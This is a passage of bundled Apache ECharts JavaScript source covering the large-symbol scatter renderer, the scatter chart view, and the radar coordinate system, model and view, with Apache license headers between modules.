图形旋转控制\n\n        large: false,\n        // Available when large is true\n        largeThreshold: 2000,\n        // cursor: null,\n\n        // label: {\n            // show: false\n            // distance: 5,\n            // formatter: 标签文本格式器，同Tooltip.formatter，不支持异步回调\n            // position: 默认自适应，水平布局为'top'，垂直布局为'right'，可选为\n            //           'inside'|'left'|'right'|'top'|'bottom'\n            // 默认使用全局文本样式，详见TEXTSTYLE\n        // },\n        itemStyle: {\n            opacity: 0.8\n            // color: 各异\n        },\n\n        // If clip the overflow graphics\n        // Works on cartesian / polar series\n        clip: true\n\n        // progressive: null\n    }\n\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/* global Float32Array */\n\n// TODO Batch by color\n\nvar BOOST_SIZE_THRESHOLD = 4;\n\nvar LargeSymbolPath = extendShape({\n\n    shape: {\n        points: null\n    },\n\n    symbolProxy: null,\n\n    softClipShape: null,\n\n    buildPath: function (path, shape) {\n        var points = shape.points;\n        var size = shape.size;\n\n        var symbolProxy = this.symbolProxy;\n        var symbolProxyShape = symbolProxy.shape;\n        var ctx = path.getContext ? path.getContext() : path;\n        var canBoost = ctx && size[0] < BOOST_SIZE_THRESHOLD;\n\n        // Do draw in afterBrush.\n        if (canBoost) {\n            return;\n        }\n\n        for (var i = 0; i < points.length;) {\n            var x = points[i++];\n            var y = points[i++];\n\n            if (isNaN(x) || isNaN(y)) {\n                continue;\n            }\n            if (this.softClipShape && !this.softClipShape.contain(x, y)) {\n                continue;\n            }\n\n            symbolProxyShape.x = x - size[0] / 2;\n            symbolProxyShape.y = y - size[1] / 2;\n            symbolProxyShape.width = size[0];\n            symbolProxyShape.height = size[1];\n\n            symbolProxy.buildPath(path, symbolProxyShape, true);\n        }\n    },\n\n    afterBrush: function (ctx) {\n        var shape = this.shape;\n        var points = shape.points;\n        var size = shape.size;\n        var canBoost = size[0] < BOOST_SIZE_THRESHOLD;\n\n        if (!canBoost) {\n            return;\n        }\n\n        this.setTransform(ctx);\n        // PENDING If style or other canvas status changed?\n        for (var i = 0; i < points.length;) {\n            var x = points[i++];\n            var y = points[i++];\n            if (isNaN(x) || isNaN(y)) {\n                continue;\n            }\n            if (this.softClipShape && !this.softClipShape.contain(x, y)) {\n                continue;\n            }\n            // fillRect is faster than building a rect path and draw.\n            // And it support light globalCompositeOperation.\n            ctx.fillRect(\n                x - size[0] / 2, y - size[1] / 2,\n                size[0], size[1]\n            );\n        }\n\n        this.restoreTransform(ctx);\n    },\n\n    findDataIndex: function (x, y) {\n        // TODO ???\n        // Consider transform\n\n        var shape = this.shape;\n        var points = shape.points;\n        var size = shape.size;\n\n        var w = Math.max(size[0], 4);\n        var h = Math.max(size[1], 4);\n\n        // Not consider transform\n        // Treat each element as a rect\n        // top down traverse\n        for (var idx = points.length / 2 - 1; idx >= 0; idx--) {\n            var i = idx * 2;\n            var x0 = points[i] - w / 2;\n            var y0 = points[i + 1] - h / 2;\n            if (x >= x0 && y >= y0 && x <= x0 + w && y <= y0 + h) {\n                return idx;\n            }\n        }\n\n        return -1;\n    }\n});\n\nfunction LargeSymbolDraw() {\n    this.group = new Group();\n}\n\nvar largeSymbolProto = LargeSymbolDraw.prototype;\n\nlargeSymbolProto.isPersistent = function () {\n    return !this._incremental;\n};\n\n/**\n * Update symbols draw by new data\n * @param {module:echarts/data/List} data\n * @param {Object} opt\n * @param {Object} [opt.clipShape]\n */\nlargeSymbolProto.updateData = function (data, opt) {\n    this.group.removeAll();\n    var symbolEl = new LargeSymbolPath({\n        rectHover: true,\n        cursor: 'default'\n    });\n\n    symbolEl.setShape({\n        points: data.getLayout('symbolPoints')\n    });\n    this._setCommon(symbolEl, data, false, opt);\n    this.group.add(symbolEl);\n\n    this._incremental = null;\n};\n\nlargeSymbolProto.updateLayout = function (data) {\n    if (this._incremental) {\n        return;\n    }\n\n    var points = data.getLayout('symbolPoints');\n    this.group.eachChild(function (child) {\n        if (child.startIndex != null) {\n            var len = (child.endIndex - child.startIndex) * 2;\n            var byteOffset = child.startIndex * 4 * 2;\n            points = new Float32Array(points.buffer, byteOffset, len);\n        }\n        child.setShape('points', points);\n    });\n};\n\nlargeSymbolProto.incrementalPrepareUpdate = function (data) {\n    this.group.removeAll();\n\n    this._clearIncremental();\n    // Only use incremental displayables when data amount is larger than 2 million.\n    // PENDING Incremental data?\n    if (data.count() > 2e6) {\n        if (!this._incremental) {\n            this._incremental = new IncrementalDisplayble({\n                silent: true\n            });\n        }\n        this.group.add(this._incremental);\n    }\n    else {\n        this._incremental = null;\n    }\n};\n\nlargeSymbolProto.incrementalUpdate = function (taskParams, data, opt) {\n    var symbolEl;\n    if (this._incremental) {\n        symbolEl = new LargeSymbolPath();\n        this._incremental.addDisplayable(symbolEl, true);\n    }\n    else {\n        symbolEl = new LargeSymbolPath({\n            rectHover: true,\n            cursor: 'default',\n            startIndex: taskParams.start,\n            endIndex: taskParams.end\n        });\n        symbolEl.incremental = true;\n        this.group.add(symbolEl);\n    }\n\n    symbolEl.setShape({\n        points: data.getLayout('symbolPoints')\n    });\n    this._setCommon(symbolEl, data, !!this._incremental, opt);\n};\n\nlargeSymbolProto._setCommon = function (symbolEl, data, isIncremental, opt) {\n    var hostModel = data.hostModel;\n\n    opt = opt || {};\n    // TODO\n    // if (data.hasItemVisual.symbolSize) {\n    //     // TODO typed array?\n    //     symbolEl.setShape('sizes', data.mapArray(\n    //         function (idx) {\n    //             var size = data.getItemVisual(idx, 'symbolSize');\n    //             return (size instanceof Array) ? size : [size, size];\n    //         }\n    //     ));\n    // }\n    // else {\n    var size = data.getVisual('symbolSize');\n    symbolEl.setShape('size', (size instanceof Array) ? size : [size, size]);\n    // }\n\n    symbolEl.softClipShape = opt.clipShape || null;\n    // Create symbolProxy to build path for each data\n    symbolEl.symbolProxy = createSymbol(\n        data.getVisual('symbol'), 0, 0, 0, 0\n    );\n    // Use symbolProxy setColor method\n    symbolEl.setColor = symbolEl.symbolProxy.setColor;\n\n    var extrudeShadow = symbolEl.shape.size[0] < BOOST_SIZE_THRESHOLD;\n    symbolEl.useStyle(\n        // Draw shadow when doing fillRect is extremely slow.\n        hostModel.getModel('itemStyle').getItemStyle(extrudeShadow ? ['color', 'shadowBlur', 'shadowColor'] : ['color'])\n    );\n\n    var visualColor = data.getVisual('color');\n    if (visualColor) {\n        symbolEl.setColor(visualColor);\n    }\n\n    if (!isIncremental) {\n        // Enable tooltip\n        // PENDING May have performance issue when path is extremely large\n        symbolEl.seriesIndex = hostModel.seriesIndex;\n        symbolEl.on('mousemove', function (e) {\n            symbolEl.dataIndex = null;\n            var dataIndex = symbolEl.findDataIndex(e.offsetX, e.offsetY);\n            if (dataIndex >= 0) {\n                // Provide dataIndex for tooltip\n                symbolEl.dataIndex = dataIndex + (symbolEl.startIndex || 0);\n            }\n        });\n    }\n};\n\nlargeSymbolProto.remove = function () {\n    this._clearIncremental();\n    this._incremental = null;\n    this.group.removeAll();\n};\n\nlargeSymbolProto._clearIncremental = function () {\n    var incremental = this._incremental;\n    if (incremental) {\n        incremental.clearDisplaybles();\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nextendChartView({\n\n    type: 'scatter',\n\n    render: function (seriesModel, ecModel, api) {\n        var data = seriesModel.getData();\n\n        var symbolDraw = this._updateSymbolDraw(data, seriesModel);\n\n        symbolDraw.updateData(data, {\n            // TODO\n            // If this parameter should be a shape or a bounding volume\n            // shape will be more general.\n            // But bounding volume like bounding rect will be much faster in the contain calculation\n            clipShape: this._getClipShape(seriesModel)\n        });\n\n        this._finished = true;\n    },\n\n    incrementalPrepareRender: function (seriesModel, ecModel, api) {\n        var data = seriesModel.getData();\n        var symbolDraw = this._updateSymbolDraw(data, seriesModel);\n\n        symbolDraw.incrementalPrepareUpdate(data);\n\n        this._finished = false;\n    },\n\n    incrementalRender: function (taskParams, seriesModel, ecModel) {\n        this._symbolDraw.incrementalUpdate(taskParams, seriesModel.getData(), {\n            clipShape: this._getClipShape(seriesModel)\n        });\n\n        this._finished = taskParams.end === seriesModel.getData().count();\n    },\n\n    updateTransform: function (seriesModel, ecModel, api) {\n        var data = seriesModel.getData();\n        // Must mark group dirty and make sure the incremental layer will be cleared\n        // PENDING\n        this.group.dirty();\n\n        if (!this._finished || data.count() > 1e4 || !this._symbolDraw.isPersistent()) {\n            return {\n                update: true\n            };\n        }\n        else {\n            var res = pointsLayout().reset(seriesModel);\n            if (res.progress) {\n                res.progress({ start: 0, end: data.count() }, data);\n            }\n\n            this._symbolDraw.updateLayout(data);\n        }\n    },\n\n    _getClipShape: function (seriesModel) {\n        var coordSys = seriesModel.coordinateSystem;\n        var clipArea = coordSys && coordSys.getArea && coordSys.getArea();\n        return seriesModel.get('clip', true) ? clipArea : null;\n    },\n\n    _updateSymbolDraw: function (data, seriesModel) {\n        var symbolDraw = this._symbolDraw;\n        var pipelineContext = seriesModel.pipelineContext;\n        var isLargeDraw = pipelineContext.large;\n\n        if (!symbolDraw || isLargeDraw !== this._isLargeDraw) {\n            symbolDraw && symbolDraw.remove();\n            symbolDraw = this._symbolDraw = isLargeDraw\n                ? new LargeSymbolDraw()\n                : new SymbolDraw();\n            this._isLargeDraw = isLargeDraw;\n            this.group.removeAll();\n        }\n\n        this.group.add(symbolDraw.group);\n\n        return symbolDraw;\n    },\n\n    remove: function (ecModel, api) {\n        this._symbolDraw && this._symbolDraw.remove(true);\n        this._symbolDraw = null;\n    },\n\n    dispose: function () {}\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// import * as zrUtil from 'zrender/src/core/util';\n\n// In case developer forget to include grid component\nregisterVisual(visualSymbol('scatter', 'circle'));\nregisterLayout(pointsLayout('scatter'));\n\n// echarts.registerProcessor(function (ecModel, api) {\n//     ecModel.eachSeriesByType('scatter', function (seriesModel) {\n//         var data = seriesModel.getData();\n//         var coordSys = seriesModel.coordinateSystem;\n//         if (coordSys.type !== 'geo') {\n//             return;\n//         }\n//         var startPt = coordSys.pointToData([0, 0]);\n//         var endPt = coordSys.pointToData([api.getWidth(), api.getHeight()]);\n\n//         var dims = zrUtil.map(coordSys.dimensions, function (dim) {\n//             return data.mapDimension(dim);\n//         });\n//         var range = {};\n//         range[dims[0]] = [Math.min(startPt[0], endPt[0]), Math.max(startPt[0], endPt[0])];\n//         range[dims[1]] = [Math.min(startPt[1], endPt[1]), Math.max(startPt[1], endPt[1])];\n\n//         data.selectRange(range);\n//     });\n// });\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nfunction IndicatorAxis(dim, scale, radiusExtent) {\n    Axis.call(this, dim, scale, radiusExtent);\n\n    /**\n     * Axis type\n     *  - 'category'\n     *  - 'value'\n     *  - 'time'\n     *  - 'log'\n     * @type {string}\n     */\n    this.type = 'value';\n\n    this.angle = 0;\n\n    /**\n     * Indicator name\n     * @type {string}\n     */\n    this.name = '';\n    /**\n     * @type {module:echarts/model/Model}\n     */\n    this.model;\n}\n\ninherits(IndicatorAxis, Axis);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// TODO clockwise\n\nfunction Radar(radarModel, ecModel, api) {\n\n    this._model = radarModel;\n    /**\n     * Radar dimensions\n     * @type {Array.<string>}\n     */\n    this.dimensions = [];\n\n    this._indicatorAxes = map(radarModel.getIndicatorModels(), function (indicatorModel, idx) {\n        var dim = 'indicator_' + idx;\n        var indicatorAxis = new IndicatorAxis(dim,\n            (indicatorModel.get('axisType') === 'log') ? new LogScale() : new IntervalScale());\n        indicatorAxis.name = indicatorModel.get('name');\n        // Inject model and axis\n        indicatorAxis.model = indicatorModel;\n        indicatorModel.axis = indicatorAxis;\n        this.dimensions.push(dim);\n        return indicatorAxis;\n    }, this);\n\n    this.resize(radarModel, api);\n\n    /**\n     * @type {number}\n     * @readOnly\n     */\n    this.cx;\n    /**\n     * @type {number}\n     * @readOnly\n     */\n    this.cy;\n    /**\n     * @type {number}\n     * @readOnly\n     */\n    this.r;\n    /**\n     * @type {number}\n     * @readOnly\n     */\n    this.r0;\n    /**\n     * @type {number}\n     * @readOnly\n     */\n    this.startAngle;\n}\n\nRadar.prototype.getIndicatorAxes = function () {\n    return this._indicatorAxes;\n};\n\nRadar.prototype.dataToPoint = function (value, indicatorIndex) {\n    var indicatorAxis = this._indicatorAxes[indicatorIndex];\n\n    return this.coordToPoint(indicatorAxis.dataToCoord(value), indicatorIndex);\n};\n\nRadar.prototype.coordToPoint = function (coord, indicatorIndex) {\n    var indicatorAxis = this._indicatorAxes[indicatorIndex];\n    var angle = indicatorAxis.angle;\n    var x = this.cx + coord * Math.cos(angle);\n    var y = this.cy - coord * Math.sin(angle);\n    return [x, y];\n};\n\nRadar.prototype.pointToData = function (pt) {\n    var dx = pt[0] - this.cx;\n    var dy = pt[1] - this.cy;\n    var radius = Math.sqrt(dx * dx + dy * dy);\n    dx /= radius;\n    dy /= radius;\n\n    var radian = Math.atan2(-dy, dx);\n\n    // Find the closest angle\n    // FIXME index can calculated directly\n    var minRadianDiff = Infinity;\n    var closestAxis;\n    var closestAxisIdx = -1;\n    for (var i = 0; i < this._indicatorAxes.length; i++) {\n        var indicatorAxis = this._indicatorAxes[i];\n        var diff = Math.abs(radian - indicatorAxis.angle);\n        if (diff < minRadianDiff) {\n            closestAxis = indicatorAxis;\n            closestAxisIdx = i;\n            minRadianDiff = diff;\n        }\n    }\n\n    return [closestAxisIdx, +(closestAxis && closestAxis.coordToData(radius))];\n};\n\nRadar.prototype.resize = function (radarModel, api) {\n    var center = radarModel.get('center');\n    var viewWidth = api.getWidth();\n    var viewHeight = api.getHeight();\n    var viewSize = Math.min(viewWidth, viewHeight) / 2;\n    this.cx = parsePercent$1(center[0], viewWidth);\n    this.cy = parsePercent$1(center[1], viewHeight);\n\n    this.startAngle = radarModel.get('startAngle') * Math.PI / 180;\n\n    // radius may be single value like `20`, `'80%'`, or array like `[10, '80%']`\n    var radius = radarModel.get('radius');\n    if (typeof radius === 'string' || typeof radius === 'number') {\n        radius = [0, radius];\n    }\n    this.r0 = parsePercent$1(radius[0], viewSize);\n    this.r = parsePercent$1(radius[1], viewSize);\n\n    each$1(this._indicatorAxes, function (indicatorAxis, idx) {\n        indicatorAxis.setExtent(this.r0, this.r);\n        var angle = (this.startAngle + idx * Math.PI * 2 / this._indicatorAxes.length);\n        // Normalize to [-PI, PI]\n        angle = Math.atan2(Math.sin(angle), Math.cos(angle));\n        indicatorAxis.angle = angle;\n    }, this);\n};\n\nRadar.prototype.update = function (ecModel, api) {\n    var indicatorAxes = this._indicatorAxes;\n    var radarModel = this._model;\n    each$1(indicatorAxes, function (indicatorAxis) {\n        indicatorAxis.scale.setExtent(Infinity, -Infinity);\n    });\n    ecModel.eachSeriesByType('radar', function (radarSeries, idx) {\n        if (radarSeries.get('coordinateSystem') !== 'radar'\n            || ecModel.getComponent('radar', radarSeries.get('radarIndex')) !== radarModel\n        ) {\n            return;\n        }\n        var data = radarSeries.getData();\n        each$1(indicatorAxes, function (indicatorAxis) {\n            indicatorAxis.scale.unionExtentFromData(data, data.mapDimension(indicatorAxis.dim));\n        });\n    }, this);\n\n    var splitNumber = radarModel.get('splitNumber');\n\n    function increaseInterval(interval) {\n        var exp10 = Math.pow(10, Math.floor(Math.log(interval) / Math.LN10));\n        // Increase interval\n        var f = interval / exp10;\n        if (f === 2) {\n            f = 5;\n        }\n        else { // f is 2 or 5\n            f *= 2;\n        }\n        return f * exp10;\n    }\n    // Force all the axis fixing the maxSplitNumber.\n    each$1(indicatorAxes, function (indicatorAxis, idx) {\n        var rawExtent = getScaleExtent(indicatorAxis.scale, indicatorAxis.model);\n        niceScaleExtent(indicatorAxis.scale, indicatorAxis.model);\n\n        var axisModel = indicatorAxis.model;\n        var scale = indicatorAxis.scale;\n        var fixedMin = axisModel.getMin();\n        var fixedMax = axisModel.getMax();\n        var interval = scale.getInterval();\n\n\n        if (fixedMin != null && fixedMax != null) {\n            // User set min, max, divide to get new interval\n            scale.setExtent(+fixedMin, +fixedMax);\n            scale.setInterval(\n                (fixedMax - fixedMin) / splitNumber\n            );\n        }\n        else if (fixedMin != null) {\n            var max;\n            // User set min, expand extent on the other side\n            do {\n                max = fixedMin + interval * splitNumber;\n                scale.setExtent(+fixedMin, max);\n                // Interval must been set after extent\n                // FIXME\n                scale.setInterval(interval);\n\n                interval = increaseInterval(interval);\n            } while (max < rawExtent[1] && isFinite(max) && isFinite(rawExtent[1]));\n        }\n        else if (fixedMax != null) {\n            var min;\n            // User set min, expand extent on the other side\n            do {\n                min = fixedMax - interval * splitNumber;\n                scale.setExtent(min, +fixedMax);\n                scale.setInterval(interval);\n                interval = increaseInterval(interval);\n            } while (min > rawExtent[0] && isFinite(min) && isFinite(rawExtent[0]));\n        }\n        else {\n            var nicedSplitNumber = scale.getTicks().length - 1;\n            if (nicedSplitNumber > splitNumber) {\n                interval = increaseInterval(interval);\n            }\n            // TODO\n            var max = Math.ceil(rawExtent[1] / interval) * interval;\n            var min = round$1(max - interval * splitNumber);\n            scale.setExtent(min, max);\n            scale.setInterval(interval);\n        }\n    });\n};\n\n/**\n * Radar dimensions is based on the data\n * @type {Array}\n */\nRadar.dimensions = [];\n\nRadar.create = function (ecModel, api) {\n    var radarList = [];\n    ecModel.eachComponent('radar', function (radarModel) {\n        var radar = new Radar(radarModel, ecModel, api);\n        radarList.push(radar);\n        radarModel.coordinateSystem = radar;\n    });\n    ecModel.eachSeriesByType('radar', function (radarSeries) {\n        if (radarSeries.get('coordinateSystem') === 'radar') {\n            // Inject coordinate system\n            radarSeries.coordinateSystem = radarList[radarSeries.get('radarIndex') || 0];\n        }\n    });\n    return radarList;\n};\n\nCoordinateSystemManager.register('radar', Radar);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar valueAxisDefault = axisDefault.valueAxis;\n\nfunction defaultsShow(opt, show) {\n    return defaults({\n        show: show\n    }, opt);\n}\n\nvar RadarModel = extendComponentModel({\n\n    type: 'radar',\n\n    optionUpdated: function () {\n        var boundaryGap = this.get('boundaryGap');\n        var splitNumber = this.get('splitNumber');\n        var scale = this.get('scale');\n        var axisLine = this.get('axisLine');\n        var axisTick = this.get('axisTick');\n        var axisType = this.get('axisType');\n        var axisLabel = this.get('axisLabel');\n        var nameTextStyle = this.get('name');\n        var showName = this.get('name.show');\n        var nameFormatter = this.get('name.formatter');\n        var nameGap = this.get('nameGap');\n        var triggerEvent = this.get('triggerEvent');\n\n        var indicatorModels = map(this.get('indicator') || [], function (indicatorOpt) {\n            // PENDING\n            if (indicatorOpt.max != null && indicatorOpt.max > 0 && !indicatorOpt.min) {\n                indicatorOpt.min = 0;\n            }\n            else if (indicatorOpt.min != null && indicatorOpt.min < 0 && !indicatorOpt.max) {\n                indicatorOpt.max = 0;\n            }\n            var iNameTextStyle = nameTextStyle;\n            if (indicatorOpt.color != null) {\n                iNameTextStyle = defaults({color: indicatorOpt.color}, nameTextStyle);\n            }\n            // Use same configuration\n            indicatorOpt = merge(clone(indicatorOpt), {\n                boundaryGap: boundaryGap,\n                splitNumber: splitNumber,\n                scale: scale,\n                axisLine: axisLine,\n                axisTick: axisTick,\n                axisType: axisType,\n                axisLabel: axisLabel,\n                // Compatible with 2 and use text\n                name: indicatorOpt.text,\n                nameLocation: 'end',\n                nameGap: nameGap,\n                // min: 0,\n                nameTextStyle: iNameTextStyle,\n                triggerEvent: triggerEvent\n            }, false);\n            if (!showName) {\n                indicatorOpt.name = '';\n            }\n            if (typeof nameFormatter === 'string') {\n                var indName = indicatorOpt.name;\n                indicatorOpt.name = nameFormatter.replace('{value}', indName != null ? indName : '');\n            }\n            else if (typeof nameFormatter === 'function') {\n                indicatorOpt.name = nameFormatter(\n                    indicatorOpt.name, indicatorOpt\n                );\n            }\n            var model = extend(\n                new Model(indicatorOpt, null, this.ecModel),\n                axisModelCommonMixin\n            );\n\n            // For triggerEvent.\n            model.mainType = 'radar';\n            model.componentIndex = this.componentIndex;\n\n            return model;\n        }, this);\n\n        this.getIndicatorModels = function () {\n            return indicatorModels;\n        };\n    },\n\n    defaultOption: {\n\n        zlevel: 0,\n\n        z: 0,\n\n        center: ['50%', '50%'],\n\n        radius: '75%',\n\n        startAngle: 90,\n\n        name: {\n            show: true\n            // formatter: null\n            // textStyle: {}\n        },\n\n        boundaryGap: [0, 0],\n\n        splitNumber: 5,\n\n        nameGap: 15,\n\n        scale: false,\n\n        // Polygon or circle\n        shape: 'polygon',\n\n        axisLine: merge(\n            {\n                lineStyle: {\n                    color: '#bbb'\n                }\n            },\n            valueAxisDefault.axisLine\n        ),\n        axisLabel: defaultsShow(valueAxisDefault.axisLabel, false),\n        axisTick: defaultsShow(valueAxisDefault.axisTick, false),\n        axisType: 'interval',\n        splitLine: defaultsShow(valueAxisDefault.splitLine, true),\n        splitArea: defaultsShow(valueAxisDefault.splitArea, true),\n\n        // {text, min, max}\n        indicator: []\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar axisBuilderAttrs$1 = [\n    'axisLine', 'axisTickLabel', 'axisName'\n];\n\nextendComponentView({\n\n    type: 'radar',\n\n    render: function (radarModel, ecModel, api) {\n        var group = this.group;\n        group.removeAll();\n\n        this._buildAxes(radarModel);\n        this._buildSplitLineAndArea(radarModel);\n    },\n\n    _buildAxes: function (radarModel) {\n        var radar = radarModel.coordinateSystem;\n        var indicatorAxes = radar.getIndicatorAxes();\n        var axisBuilders = map(indicatorAxes, function (indicatorAxis) {\n            var axisBuilder = new AxisBuilder(indicatorAxis.model, {\n                position: [radar.cx, radar.cy],\n                rotation: indicatorAxis.angle,\n                labelDirection: -1,\n                tickDirection: -1,\n                nameDirection: 1\n            });\n            return axisBuilder;\n        });\n\n        each$1(axisBuilders, function (axisBuilder) {\n            each$1(axisBuilderAttrs$1, axisBuilder.add, axisBuilder);\n            this.group.add(axisBuilder.getGroup());\n        }, this);\n    },\n\n    _buildSplitLineAndArea: function (radarModel) {\n        var radar = radarModel.coordinateSystem;\n        var indicatorAxes = radar.getIndicatorAxes();\n        if (!indicatorAxes.length) {\n            return;\n        }\n        var shape = radarModel.get('shape');\n        var splitLineModel = radarModel.getModel('splitLine');\n        var splitAreaModel = radarModel.getModel('splitArea');\n        var lineStyleModel = splitLineModel.getModel('lineStyle');\n        var areaStyleModel = splitAreaModel.getModel('areaStyle');\n\n        var showSplitLine = splitLineModel.get('show');\n        var showSplitArea = splitAreaModel.get('show');\n        var splitLineColors = lineStyleModel.get('color');\n        var splitAreaColors = areaStyleModel.get('color');\n\n        splitLineColors = isArray(splitLineColors) ? splitLineColors : [splitLineColors];\n        splitAreaColors = isArray(splitAreaColors) ? splitAreaColors : [splitAreaColors];\n\n        var splitLines = [];\n        var splitAreas = [];\n\n        function getColorIndex(areaOrLine, areaOrLineColorList, idx) {\n            var colorIndex = idx % areaOrLineColorList.length;\n            areaOrLine[colorIndex] = areaOrLine[colorIndex] || [];\n            return colorIndex;\n        }\n\n        if (shape === 'circle') {\n            var ticksRadius = indicatorAxes[0].getTicksCoords();\n            var cx = radar.cx;\n            var cy = radar.cy;\n            for (var i = 0; i < ticksRadius.length; i++) {\n                if (showSplitLine) {\n                    var colorIndex = getColorIndex(splitLines, splitLineColors, i);\n                    splitLines[colorIndex].push(new Circle({\n                        shape: {\n                            cx: cx,\n                            cy: cy,\n                            r: ticksRadius[i].coord\n                        }\n                    }));\n                }\n                if (showSplitArea && i < ticksRadius.length - 1) {\n                    var colorIndex = getColorIndex(splitAreas, splitAreaColors, i);\n                    splitAreas[colorIndex].push(new Ring({\n                        shape: {\n                            cx: cx,\n                            cy: cy,\n                            r0: ticksRadius[i].coord,\n                            r: ticksRadius[i + 1].coord\n                        }\n                    }));\n                }\n            }\n        }\n        // Polyyon\n        else {\n            var realSplitNumber;\n            var axesTicksPoints = map(indicatorAxes, function (indicatorAxis, idx) {\n                var ticksCoords = indicatorAxis.getTicksCoords();\n                realSplitNumber = realSplitNumber == null\n                    ? ticksCoords.length - 1\n                    : Math.min(ticksCoords.length - 1, realSplitNumber);\n                return map(ticksCoords, function (tickCoord) {\n                    return radar.coordToPoint(tickCoord.coord, idx);\n                });\n            });\n\n            var prevPoints = [];\n            for (var i = 0; i <= realSplitNumber; i++) {\n                var points = [];\n                for (var j = 0; j < indicatorAxes.length; j++) {\n                    points.push(axesTicksPoints[j][i]);\n                }\n                // Close\n                if (points[0]) {\n                    points.push(points[0].slice());\n                }\n                else {\n                    if (__DEV__) {\n                        console.error('Can\\'t draw value axis ' + i);\n                    }\n                }\n\n                if (showSplitLine) {\n                    var colorIndex = getColorIndex(splitLines, splitLineColors, i);\n                    splitLines[colorIndex].push(new Polyline({\n                        shape: {\n                            points: points\n                        }\n                    }));\n                }\n                if (showSplitArea && prevPoints) {\n                    var colorIndex = getColorIndex(splitAreas, splitAreaColors, i - 1);\n                    splitAreas[colorIndex].push(new Polygon({\n                        shape: {\n                            points: points.concat(prevPoints)\n                        }\n                    }));\n                }\n                prevPoints = points.slice().reverse();\n            }\n        }\n\n        var lineStyle = lineStyleModel.getLineStyle();\n        var areaStyle = areaStyleModel.getAreaStyle();\n        // Add splitArea before splitLine\n        each$1(splitAreas, function (splitAreas, idx) {\n            this.group.add(mergePath(\n                splitAreas, {\n                    style: defaults({\n                        stroke: 'none',\n                        fill: splitAreaColors[idx % splitAreaColors.length]\n                    }, areaStyle),\n                    silent: true\n                }\n            ));\n        }, this);\n\n        each$1(splitLines, function (splitLines, idx) {\n            this.group.add(mergePath(\n                splitLines, {\n                    style: defaults({\n                        fill: 'none',\n                        stroke: splitLineColors[idx % splitLineColors.length]\n                    }, lineStyle),\n                    silent: true\n                }\n            ));\n        }, this);\n\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache 